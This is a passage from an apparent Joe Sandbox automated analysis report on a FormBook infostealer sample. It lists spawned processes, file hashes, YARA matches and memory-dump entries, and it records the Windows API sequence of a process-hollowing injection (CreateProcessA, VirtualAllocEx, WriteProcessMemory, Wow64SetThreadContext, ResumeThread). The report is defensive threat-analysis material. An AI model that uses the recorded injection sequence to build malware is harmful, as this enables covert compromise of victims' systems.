                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:03:36:15
                                                                                                                                      Start date:11/01/2025
                                                                                                                                      Path:C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe"
                                                                                                                                      Imagebase:0xb80000
                                                                                                                                      File size:140'800 bytes
                                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4129375797.0000000005340000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:03:36:27
                                                                                                                                      Start date:11/01/2025
                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                      Imagebase:0x7ff6bf500000
                                                                                                                                      File size:676'768 bytes
                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true


                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:10.2%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:227
                                                                                                                                        Total number of Limit Nodes:15

                                                                                                                                        Control-flow Graph

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'kq$TJpq$Tekq$poq$xbnq
                                                                                                                                        • API String ID: 0-2301093937
                                                                                                                                        • Opcode ID: 7028fbd7882038b6418cafaac3c1aac824d00ee8c8dc9df43ac1eca6d635abfa
                                                                                                                                        • Instruction ID: 905d4a1f3d3350fa08b6cd42ee96ac3d87c14438a0a4c8b718f651f355652c09
                                                                                                                                        • Opcode Fuzzy Hash: 7028fbd7882038b6418cafaac3c1aac824d00ee8c8dc9df43ac1eca6d635abfa
                                                                                                                                        • Instruction Fuzzy Hash: 70B2C5B5E01228CFDB54CF69C984AD9BBB2FF89304F1581E9D509AB265DB319E81CF40
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'kq
                                                                                                                                        • API String ID: 0-3255046985
                                                                                                                                        • Opcode ID: 2d79f17c03c9e20dd0267c66f6e5413524ec614351a30b219eb5b6b545e0ebbb
                                                                                                                                        • Instruction ID: 4ea0fc76e0d3ee12b7eef3aee90e7f240cd0c031e6492e18690b61832b95942e
                                                                                                                                        • Opcode Fuzzy Hash: 2d79f17c03c9e20dd0267c66f6e5413524ec614351a30b219eb5b6b545e0ebbb
                                                                                                                                        • Instruction Fuzzy Hash: DD714EB1A152099FDB08DF7AE94569ABFF2FBC8300F14D429D418973A8EF345A45CB80
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 28f1c39022592e799a2de79e55d68535d6c2764b2ef16b0b97499b282b624793
                                                                                                                                        • Instruction ID: deb83fdde42dab370b3b79f2a71f8b6f1d4486c87e2929bef8a141e2149c33e7
                                                                                                                                        • Opcode Fuzzy Hash: 28f1c39022592e799a2de79e55d68535d6c2764b2ef16b0b97499b282b624793
                                                                                                                                        • Instruction Fuzzy Hash: A232ACB5B023058FEB15DB69D460BAEBBF6AF89300F148469E509DB3A0CB35DD01CB91
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4da093d309f5fd202c283830ae2b8e48e4314e6e2d69349ba5d0787a80c937f7
                                                                                                                                        • Instruction ID: 50949c0c6f1203e3bbb2017985fa19fb85b576b8f75a3c19f867c9d07f9e59e4
                                                                                                                                        • Opcode Fuzzy Hash: 4da093d309f5fd202c283830ae2b8e48e4314e6e2d69349ba5d0787a80c937f7
                                                                                                                                        • Instruction Fuzzy Hash: CCA1F4B5E16228CFDB14CFA5E8447EDBBF6BF8A300F10A0A9D509AB251DB745985CF40
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 727e1e7ee710f352dfcdbb0b66640d1a55009f9e655aa03854951a06f39bb210
                                                                                                                                        • Instruction ID: 87dd2b61eaecc1a9a7134770a1f9ff6a7021f3a02c983c56f36ab65b7faecf48
                                                                                                                                        • Opcode Fuzzy Hash: 727e1e7ee710f352dfcdbb0b66640d1a55009f9e655aa03854951a06f39bb210
                                                                                                                                        • Instruction Fuzzy Hash: 7791F5B5E06229CFDB14CFA5E8447EDBBF2BF89300F10A0A9D509AB251DB745985CF40
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3f0a85630afbb260751abf00f8d2c0e88a76bc05dcd27d64be559ee6ae68a1d8
                                                                                                                                        • Instruction ID: 86fd416cb816bab6e978985dbc382ba449737908db1fe970cd31fe5a1bc84534
                                                                                                                                        • Opcode Fuzzy Hash: 3f0a85630afbb260751abf00f8d2c0e88a76bc05dcd27d64be559ee6ae68a1d8
                                                                                                                                        • Instruction Fuzzy Hash: 8381E6B4E0A218CFCB24CFA9E8846EDBBF5BF4A300F24A156D509A7316D7349981CF50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e9f74d9529656455a24672993a8dbf6f616b09a4cb96f2625ce92d72a80c371e
                                                                                                                                        • Instruction ID: 198f72b07db6ce67d1ecafa516ccadf1d7c6bb4084c8c865a51c0133836a8fb4
                                                                                                                                        • Opcode Fuzzy Hash: e9f74d9529656455a24672993a8dbf6f616b09a4cb96f2625ce92d72a80c371e
                                                                                                                                        • Instruction Fuzzy Hash: CB31C6B1E056188BDB18CFABE94469EFBF6AF89300F14D16AD918AB215EB705541CF40
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f711dad65aa215ed77d0ff0f4f688c8c3ad42d76a3f5eb77b3e04035dcbaae9c
                                                                                                                                        • Instruction ID: 847b1b569738ce8d27033ffd3086b6703408ba15afd5957f47454845bbda277d
                                                                                                                                        • Opcode Fuzzy Hash: f711dad65aa215ed77d0ff0f4f688c8c3ad42d76a3f5eb77b3e04035dcbaae9c
                                                                                                                                        • Instruction Fuzzy Hash: A231A2B1E056188BEB18CFABD84469EFAF3AFC8300F14D16AD818A7225EB305541CF54

                                                                                                                                        APIs
                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07307BDE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                        • Opcode ID: 6b07a72eef89a6db3fb6acfdc20dd52fee2306b2e264a6d8ec6bbba7d0009cb2
                                                                                                                                        • Instruction ID: 0b430673368281fb080185c8b6174e59231d74c05ccd64f98b7ff42f0520306f
                                                                                                                                        • Opcode Fuzzy Hash: 6b07a72eef89a6db3fb6acfdc20dd52fee2306b2e264a6d8ec6bbba7d0009cb2
                                                                                                                                        • Instruction Fuzzy Hash: 95A16DB1D0021ADFEF14CF68C8517DEBBB6BF44310F1485A9E849A7290DB74A985CF91

                                                                                                                                        APIs
                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07307BDE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                        • Opcode ID: 05e222fca4ef2a03da14499fc70d6ed1f919fe77e9c529c213851bffd0a808b3
                                                                                                                                        • Instruction ID: 8cf81ac011d64bb60b51525f65c47784af1476cf5a601a693df4270ba5541113
                                                                                                                                        • Opcode Fuzzy Hash: 05e222fca4ef2a03da14499fc70d6ed1f919fe77e9c529c213851bffd0a808b3
                                                                                                                                        • Instruction Fuzzy Hash: F2916EB1D0021ADFEF14CF68C8517DEBBB2BF48310F1485A9E849A7290DB74A985CF91

                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0305B07E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1697354167.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3050000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                        • Opcode ID: d3d73ee530cb2545032b9db72f7b64a6b6f79297d43c15dda02a22321ac60482
                                                                                                                                        • Instruction ID: 2973f583e0cd4f8e9f1fea1c5104db22c0aacdb6e8bf29d912480df5a2142f1f
                                                                                                                                        • Opcode Fuzzy Hash: d3d73ee530cb2545032b9db72f7b64a6b6f79297d43c15dda02a22321ac60482
                                                                                                                                        • Instruction Fuzzy Hash: 2F7145B0A01B058FDB65DF69D44479BBBF5FF88300F048A29E88AD7A50DB34E845CB95

                                                                                                                                        APIs
                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 030559C9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1697354167.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3050000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: a21822987088fcba301cd1e998ce8065d5abe1e8d9e8b8a8fd229063f6cab6a0
                                                                                                                                        • Instruction ID: 36fa20294abcaed711b151c80ec3a9ce210b376ce526ab2abf8b959df6ec8d17
                                                                                                                                        • Opcode Fuzzy Hash: a21822987088fcba301cd1e998ce8065d5abe1e8d9e8b8a8fd229063f6cab6a0
                                                                                                                                        • Instruction Fuzzy Hash: AF4102B0C01619CBCB24CFA9C884B8EBBF5BF49304F24805AE409AB251DB756946CF90

                                                                                                                                        APIs
                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 030559C9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1697354167.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3050000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: fc242ed383590be8ac0ab7cc229fc4ce9114cddb6e8203e2f6d0f78541e24771
                                                                                                                                        • Instruction ID: 3f293fc33b8c2f0c5a4e894ced5f739575c3b441fcdf4aa797b40352027111f4
                                                                                                                                        • Opcode Fuzzy Hash: fc242ed383590be8ac0ab7cc229fc4ce9114cddb6e8203e2f6d0f78541e24771
                                                                                                                                        • Instruction Fuzzy Hash: 3F41F2B0C01619CBDB24CFA9C88478EBBF5BF49304F24806AE409AB255DB756945CF90

                                                                                                                                        APIs
                                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07E43F7D,?,?), ref: 07E4402F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DrawText
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2175133113-0
                                                                                                                                        • Opcode ID: b731bda0be99650204af5bcec3071f8ba6da8a5e5652b15b22fe56b5deb44b08
                                                                                                                                        • Instruction ID: 20f56caf19916a4bd0fbe8a71fdba5f4b0da741569b5b46c7b7a4ab45c0e916b
                                                                                                                                        • Opcode Fuzzy Hash: b731bda0be99650204af5bcec3071f8ba6da8a5e5652b15b22fe56b5deb44b08
                                                                                                                                        • Instruction Fuzzy Hash: 4431E0B59013499FCB10CF9AE884ADEBBF5EB48324F14842AE919A7350D775A950CFA0

                                                                                                                                        APIs
                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073077B0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                        • Opcode ID: 34118209074553554ec8815b1332a372582ba57929cdfb3b07c003ed88b7d922
                                                                                                                                        • Instruction ID: 843f35803e11e3e838b6aab762e95eecebf495b7b73938f6bda9de70c65fed40
                                                                                                                                        • Opcode Fuzzy Hash: 34118209074553554ec8815b1332a372582ba57929cdfb3b07c003ed88b7d922
                                                                                                                                        • Instruction Fuzzy Hash: 5B2137B59003199FDB10CFA9C885BEEBBF4FF48360F10842AE959A7251C7789544CFA0

                                                                                                                                        APIs
                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073077B0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                        APIs
                                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07E43F7D,?,?), ref: 07E4402F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DrawText
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2175133113-0

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 818 7307580-73075d3 821 73075e3-7307613 Wow64SetThreadContext 818->821 822 73075d5-73075e1 818->822 824 7307615-730761b 821->824 825 730761c-730764c 821->825 822->821 824->825
                                                                                                                                        APIs
                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07307606
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 983334009-0

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 829 7307809-730789d ReadProcessMemory 833 73078a6-73078d6 829->833 834 730789f-73078a5 829->834 834->833
                                                                                                                                        APIs
                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07307890
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                        APIs
                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0305D6D6,?,?,?,?,?), ref: 0305D797
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1697354167.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3050000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                        APIs
                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0305D6D6,?,?,?,?,?), ref: 0305D797
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1697354167.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3050000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                        APIs
                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07307606
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                        APIs
                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07307890
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                        APIs
                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073076CE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        APIs
                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073076CE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ResumeThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                        APIs
                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07309D2D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ResumeThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0305B07E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1697354167.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3050000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                        APIs
                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07309D2D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696937234.000000000192D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0192D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_192d000_QsBdpe1gK5.jbxd
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696998882.000000000193D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0193D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_193d000_QsBdpe1gK5.jbxd
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696998882.000000000193D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0193D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_193d000_QsBdpe1gK5.jbxd
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696998882.000000000193D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0193D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_193d000_QsBdpe1gK5.jbxd
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696937234.000000000192D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0192D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_192d000_QsBdpe1gK5.jbxd
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696998882.000000000193D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0193D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_193d000_QsBdpe1gK5.jbxd
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696937234.000000000192D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0192D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_192d000_QsBdpe1gK5.jbxd
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696937234.000000000192D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0192D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_192d000_QsBdpe1gK5.jbxd
